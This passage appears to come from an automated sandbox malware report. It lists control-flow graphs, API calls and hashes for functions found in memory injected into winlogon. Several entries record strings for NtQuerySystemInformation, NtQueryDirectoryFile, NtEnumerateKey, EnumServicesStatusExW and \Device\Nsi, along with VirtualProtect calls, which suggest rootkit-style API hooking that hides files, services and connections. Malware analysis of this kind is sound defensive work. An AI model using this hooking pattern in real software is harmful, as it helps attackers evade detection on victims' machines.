192->199 193->192 194->193 206 1f385bc54d0 195->206 207 1f385bc54d2 195->207 196->184 198->199 208 1f385bc55bb-1f385bc55c3 199->208 209 1f385bc55c8-1f385bc5661 call 1f385bc4510 call 1f385bc4470 VirtualProtect 199->209 201->184 202->187 206->184 207->182 214 1f385bc5671-1f385bc56d1 209->214 215 1f385bc5663-1f385bc5668 GetLastError 209->215 214->138 215->214
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                        • Instruction ID: 48e9b6394c2e16e0435a437a14de86af20b7fc3907a494e4619b9524de145d43
                                                        • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                        • Instruction Fuzzy Hash: 0A02CA32219B8586EBA1CB55E4903AAB7A0F3D47D5F100125FA9E47BE8DF7CC944CB04
                                                        Function 000001F385BC39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction ID: e020fba28db42efb86b7b281ff6320db8e868d5782e8dd22b64bfe2f8f0cfe4e
                                                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction Fuzzy Hash: 74314132219A8581EAB2DB15E0503AE66A0F3D87D4F500635F9DE46BECDF7DCB509B08
                                                        Function 000001F385BC328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 64b7ee1ffacfb3a96812083a67adc2b6f64ddc7d970daca41989523910d28d47
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 52115E3061060382FBE6AB64E8457F92294A7F43E5F944334BD26825D9EF7DCA449208
                                                        Function 000001F385BC4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                        • Instruction ID: 4724cafcdfdbfa4d6616eb3151ddc47c4ed22c72909894bd528e3ad7df338f73
                                                        • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                        • Instruction Fuzzy Hash: CAF03036218B05C0D6B1DB01E4417AA6BA0F7D87F4F140225FE9D43BADCA3CCB848B44
                                                        Function 000001F385B9273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 263 1f385b9273c-1f385b927a4 call 1f385b929d4 * 4 272 1f385b929b2 263->272 273 1f385b927aa-1f385b927ad 263->273 275 1f385b929b4-1f385b929d0 272->275 273->272 274 1f385b927b3-1f385b927b6 273->274 274->272 276 1f385b927bc-1f385b927bf 274->276 276->272 277 1f385b927c5-1f385b927e6 VirtualAlloc 276->277 277->272 278 1f385b927ec-1f385b9280c 277->278 279 1f385b9280e-1f385b92836 278->279 280 1f385b92838-1f385b9283f 278->280 279->279 279->280 281 1f385b928df-1f385b928e6 280->281 282 1f385b92845-1f385b92852 280->282 283 1f385b928ec-1f385b92901 281->283 284 1f385b92992-1f385b929b0 281->284 282->281 285 1f385b92858-1f385b9286a LoadLibraryA 282->285 283->284 286 1f385b92907 283->286 284->275 287 1f385b9286c-1f385b92878 285->287 288 1f385b928ca-1f385b928d2 285->288 291 1f385b9290d-1f385b92921 286->291 292 1f385b928c5-1f385b928c8 287->292 288->285 289 1f385b928d4-1f385b928d9 288->289 289->281 294 1f385b92982-1f385b9298c 291->294 295 1f385b92923-1f385b92934 291->295 292->288 293 1f385b9287a-1f385b9287d 292->293 299 1f385b9287f-1f385b928a5 293->299 300 1f385b928a7-1f385b928b7 293->300 294->284 294->291 297 1f385b9293f-1f385b92943 295->297 298 1f385b92936-1f385b9293d 295->298 302 1f385b9294d-1f385b92951 297->302 303 1f385b92945-1f385b9294b 297->303 301 1f385b92970-1f385b92980 298->301 304 1f385b928ba-1f385b928c1 299->304 300->304 301->294 301->295 306 1f385b92963-1f385b92967 302->306 307 1f385b92953-1f385b92961 302->307 303->301 304->292 306->301 308 1f385b92969-1f385b9296c 306->308 307->301 308->301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocLibraryLoadVirtual
                                                        • String ID:
                                                        • API String ID: 3550616410-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: c04cbf0e898960135302cb09ad6b63cbc2f212c8dd94948b103ddf5d24b099a9
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 9E61C136F0169287DF958F6590407B9F392FBA4BA4F948231EE69077C8EB38D952C700
                                                        Function 000001F385BC1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001F385BC1628: GetProcessHeap.KERNEL32 ref: 000001F385BC1633
                                                          • Part of subcall function 000001F385BC1628: HeapAlloc.KERNEL32 ref: 000001F385BC1642
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC16B2
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC16DF
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC16F9
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1719
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1734
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1754
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC176F
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC178F
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC17AA
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC17CA
                                                        • Sleep.KERNEL32 ref: 000001F385BC1AD7
                                                        • SleepEx.KERNELBASE ref: 000001F385BC1ADD
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC17E5
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1805
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1820
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1840
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC185B
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC187B
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1896
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC18A0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 10bcb2d6682a129b921ec7b08a8e6ea337be82993633d3c01402af06af3f6023
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 8731FF7120164341FFD69B26D6413F953A4ABE4BF0F045631BE3AA73DDEE28CE518614
                                                        Function 000001F385BF273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 348 1f385bf273c-1f385bf27a4 call 1f385bf29d4 * 4 357 1f385bf29b2 348->357 358 1f385bf27aa-1f385bf27ad 348->358 360 1f385bf29b4-1f385bf29d0 357->360 358->357 359 1f385bf27b3-1f385bf27b6 358->359 359->357 361 1f385bf27bc-1f385bf27bf 359->361 361->357 362 1f385bf27c5-1f385bf27e6 VirtualAlloc 361->362 362->357 363 1f385bf27ec-1f385bf280c 362->363 364 1f385bf280e-1f385bf2836 363->364 365 1f385bf2838-1f385bf283f 363->365 364->364 364->365 366 1f385bf28df-1f385bf28e6 365->366 367 1f385bf2845-1f385bf2852 365->367 368 1f385bf2992-1f385bf29b0 366->368 369 1f385bf28ec-1f385bf2901 366->369 367->366 370 1f385bf2858-1f385bf286a 367->370 368->360 369->368 371 1f385bf2907 369->371 377 1f385bf286c-1f385bf2878 370->377 378 1f385bf28ca-1f385bf28d2 370->378 373 1f385bf290d-1f385bf2921 371->373 375 1f385bf2982-1f385bf298c 373->375 376 1f385bf2923-1f385bf2934 373->376 375->368 375->373 381 1f385bf293f-1f385bf2943 376->381 382 1f385bf2936-1f385bf293d 376->382 383 1f385bf28c5-1f385bf28c8 377->383 378->370 379 1f385bf28d4-1f385bf28d9 378->379 379->366 386 1f385bf294d-1f385bf2951 381->386 387 1f385bf2945-1f385bf294b 381->387 385 1f385bf2970-1f385bf2980 382->385 383->378 384 1f385bf287a-1f385bf287d 383->384 388 1f385bf287f-1f385bf28a5 384->388 389 1f385bf28a7-1f385bf28b7 384->389 385->375 385->376 390 1f385bf2963-1f385bf2967 386->390 391 1f385bf2953-1f385bf2961 386->391 387->385 392 1f385bf28ba-1f385bf28c1 388->392 389->392 390->385 393 1f385bf2969-1f385bf296c 390->393 391->385 392->383 393->385
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: ef4c410e6d960397a7e29bb07b90f3ccf10a3190337873fb1e91f7c74c59de08
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: F061E632B0165187DF958F95A8007B9B392FBA4BE4F948235EE69877C8DA38D952C700

                                                        Non-executed Functions

                                                        Function 000001F385BC2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 3e014252695f0c00fb7a0bb71849fee8b47a642a1c148055653ae182c2af6344
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 54B1807221065282EF9A9F65C4407F9A3A4F7A5BE4F445226FEA9637D8DF38CE40C344
                                                        Function 000001F385BC7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: e0b9b7052118a7287e8f390f34dccee8bc25c43afc6201edd398442163f3e76f
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 43315D72205B818AEBA19F64E8403EE7364F795794F44413AEE5D47B98EF3CCA48C714
                                                        Function 000001F385BCD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 119532e0019eb03a6f85644e89c7b11ad2598611322a358013ebae4ac99bf1c6
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: E2310B36214B818ADBA18F25E8403EE63A4F7D97A4F540225FEAD47B99DF3CC6558B00
                                                        Function 000001F385BC7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 886ad51172aaf13e8012940450bcb762d4a0f855fb16cb69d876ae1c8491be24
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: D5111F32750B0289EF81CF60E8553A833A4F7697A8F441E35EE6D47799DB7CC6988380
                                                        Function 000001F385BCDCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction ID: 0ab57e8a41362360b4c2b69986fe903eab220494ac42150a3405ac5a4fa8be70
                                                        • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction Fuzzy Hash: AD51C5367006C189FB619B72A8407EA7BA5F7947E4F144225FE6867BDDDA3CCA01C704
                                                        Function 000001F385BA36F0 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                        • Instruction ID: 6dd60b39cab2d84fa712c6e0a873e69cabff84c93a7a43a81c19e979f1af2cba
                                                        • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                        • Instruction Fuzzy Hash: 7AF068717152558EEFD98F68A40276977D1F3583D0FD08129EA9A83B48D27C8150CF04
                                                        Function 000001F385BC12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: b2b3583c4c13428535a8a1f942f546f92154c8786cef82e3cf051c49b1cbc2ed
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 63515B32200B8686EB95CF62E4483AA77A1F7D9BE9F544234EE5907798DF3CC645CB00
                                                        Function 000001F385BC1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: d595e3e3372c9b20bd3718418993cbc429e4e82f856070faa9de1b73c2b9a119
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 9831877414098BA4EE87EFA5E8516F46321A7E43E4F844273BCB9122ED9E7C8B49C354
                                                        Function 000001F385BF6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 561 1f385bf6910-1f385bf6916 562 1f385bf6951-1f385bf695b 561->562 563 1f385bf6918-1f385bf691b 561->563 564 1f385bf6a78-1f385bf6a8d 562->564 565 1f385bf691d-1f385bf6920 563->565 566 1f385bf6945-1f385bf6984 call 1f385bf6fc0 563->566 570 1f385bf6a8f 564->570 571 1f385bf6a9c-1f385bf6ab6 call 1f385bf6e54 564->571 568 1f385bf6922-1f385bf6925 565->568 569 1f385bf6938 __scrt_dllmain_crt_thread_attach 565->569 581 1f385bf6a52 566->581 582 1f385bf698a-1f385bf699f call 1f385bf6e54 566->582 573 1f385bf6931-1f385bf6936 call 1f385bf6f04 568->573 574 1f385bf6927-1f385bf6930 568->574 577 1f385bf693d-1f385bf6944 569->577 575 1f385bf6a91-1f385bf6a9b 570->575 584 1f385bf6aef-1f385bf6b20 call 1f385bf7190 571->584 585 1f385bf6ab8-1f385bf6aed call 1f385bf6f7c call 1f385bf6e1c call 1f385bf7318 call 1f385bf7130 call 1f385bf7154 call 1f385bf6fac 571->585 573->577 586 1f385bf6a54-1f385bf6a69 581->586 594 1f385bf6a6a-1f385bf6a77 call 1f385bf7190 582->594 595 1f385bf69a5-1f385bf69b6 call 1f385bf6ec4 582->595 596 1f385bf6b22-1f385bf6b28 584->596 597 1f385bf6b31-1f385bf6b37 584->597 585->575 594->564 614 1f385bf69b8-1f385bf69dc call 1f385bf72dc call 1f385bf6e0c call 1f385bf6e38 call 1f385bfac0c 595->614 615 1f385bf6a07-1f385bf6a11 call 1f385bf7130 595->615 596->597 603 1f385bf6b2a-1f385bf6b2c 596->603 598 1f385bf6b7e-1f385bf6b94 call 1f385bf268c 597->598 599 1f385bf6b39-1f385bf6b43 597->599 622 1f385bf6bcc-1f385bf6bce 598->622 623 1f385bf6b96-1f385bf6b98 598->623 605 1f385bf6b4f-1f385bf6b5d call 1f385c05780 599->605 606 1f385bf6b45-1f385bf6b4d 599->606 604 1f385bf6c1f-1f385bf6c2c 603->604 611 1f385bf6b63-1f385bf6b78 call 1f385bf6910 605->611 626 1f385bf6c15-1f385bf6c1d 605->626 606->611 611->598 611->626 614->615 664 1f385bf69de-1f385bf69e5 __scrt_dllmain_after_initialize_c 614->664 615->581 634 1f385bf6a13-1f385bf6a1f call 1f385bf7180 615->634 624 1f385bf6bd0-1f385bf6bd3 622->624 625 1f385bf6bd5-1f385bf6bea call 1f385bf6910 622->625 623->622 631 1f385bf6b9a-1f385bf6bbc call 1f385bf268c call 1f385bf6a78 623->631 624->625 624->626 625->626 644 1f385bf6bec-1f385bf6bf6 625->644 626->604 631->622 656 1f385bf6bbe-1f385bf6bc6 call 1f385c05780 631->656 653 1f385bf6a21-1f385bf6a2b call 1f385bf7098 634->653 654 1f385bf6a45-1f385bf6a50 634->654 650 1f385bf6c01-1f385bf6c11 call 1f385c05780 644->650 651 1f385bf6bf8-1f385bf6bff 644->651 650->626 651->626 653->654 663 1f385bf6a2d-1f385bf6a3b 653->663 654->586 656->622 663->654 664->615 665 1f385bf69e7-1f385bf6a04 call 1f385bfabc8 664->665 665->615
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: dd5b60a4949fe2c9e32b5ccc5ae674ce106a1ad1d7178672b7aede5bfdb929d8
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: E381903260060387FAD69FA594413F962A0ABE57E0F94A235BD65C77DEDB3CCB458700
                                                        Function 000001F385B96910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 454 1f385b96910-1f385b96916 455 1f385b96951-1f385b9695b 454->455 456 1f385b96918-1f385b9691b 454->456 459 1f385b96a78-1f385b96a8d 455->459 457 1f385b9691d-1f385b96920 456->457 458 1f385b96945-1f385b96984 call 1f385b96fc0 456->458 460 1f385b96922-1f385b96925 457->460 461 1f385b96938 __scrt_dllmain_crt_thread_attach 457->461 474 1f385b96a52 458->474 475 1f385b9698a-1f385b9699f call 1f385b96e54 458->475 462 1f385b96a9c-1f385b96ab6 call 1f385b96e54 459->462 463 1f385b96a8f 459->463 465 1f385b96931-1f385b96936 call 1f385b96f04 460->465 466 1f385b96927-1f385b96930 460->466 469 1f385b9693d-1f385b96944 461->469 477 1f385b96aef-1f385b96b20 call 1f385b97190 462->477 478 1f385b96ab8-1f385b96aed call 1f385b96f7c call 1f385b96e1c call 1f385b97318 call 1f385b97130 call 1f385b97154 call 1f385b96fac 462->478 467 1f385b96a91-1f385b96a9b 463->467 465->469 479 1f385b96a54-1f385b96a69 474->479 486 1f385b969a5-1f385b969b6 call 1f385b96ec4 475->486 487 1f385b96a6a-1f385b96a77 call 1f385b97190 475->487 488 1f385b96b22-1f385b96b28 477->488 489 1f385b96b31-1f385b96b37 477->489 478->467 506 1f385b969b8-1f385b969dc call 1f385b972dc call 1f385b96e0c call 1f385b96e38 call 1f385b9ac0c 486->506 507 1f385b96a07-1f385b96a11 call 1f385b97130 486->507 487->459 488->489 493 1f385b96b2a-1f385b96b2c 488->493 494 1f385b96b7e-1f385b96b94 call 1f385b9268c 489->494 495 1f385b96b39-1f385b96b43 489->495 500 1f385b96c1f-1f385b96c2c 493->500 515 1f385b96bcc-1f385b96bce 494->515 516 1f385b96b96-1f385b96b98 494->516 501 1f385b96b4f-1f385b96b5d call 1f385ba5780 495->501 502 1f385b96b45-1f385b96b4d 495->502 509 1f385b96b63-1f385b96b78 call 1f385b96910 501->509 519 1f385b96c15-1f385b96c1d 501->519 502->509 506->507 557 1f385b969de-1f385b969e5 __scrt_dllmain_after_initialize_c 506->557 507->474 527 1f385b96a13-1f385b96a1f call 1f385b97180 507->527 509->494 509->519 517 1f385b96bd0-1f385b96bd3 515->517 518 1f385b96bd5-1f385b96bea call 1f385b96910 515->518 516->515 524 1f385b96b9a-1f385b96bbc call 1f385b9268c call 1f385b96a78 516->524 517->518 517->519 518->519 536 1f385b96bec-1f385b96bf6 518->536 519->500 524->515 551 1f385b96bbe-1f385b96bc6 call 1f385ba5780 524->551 544 1f385b96a21-1f385b96a2b call 1f385b97098 527->544 545 1f385b96a45-1f385b96a50 527->545 541 1f385b96c01-1f385b96c11 call 1f385ba5780 536->541 542 1f385b96bf8-1f385b96bff 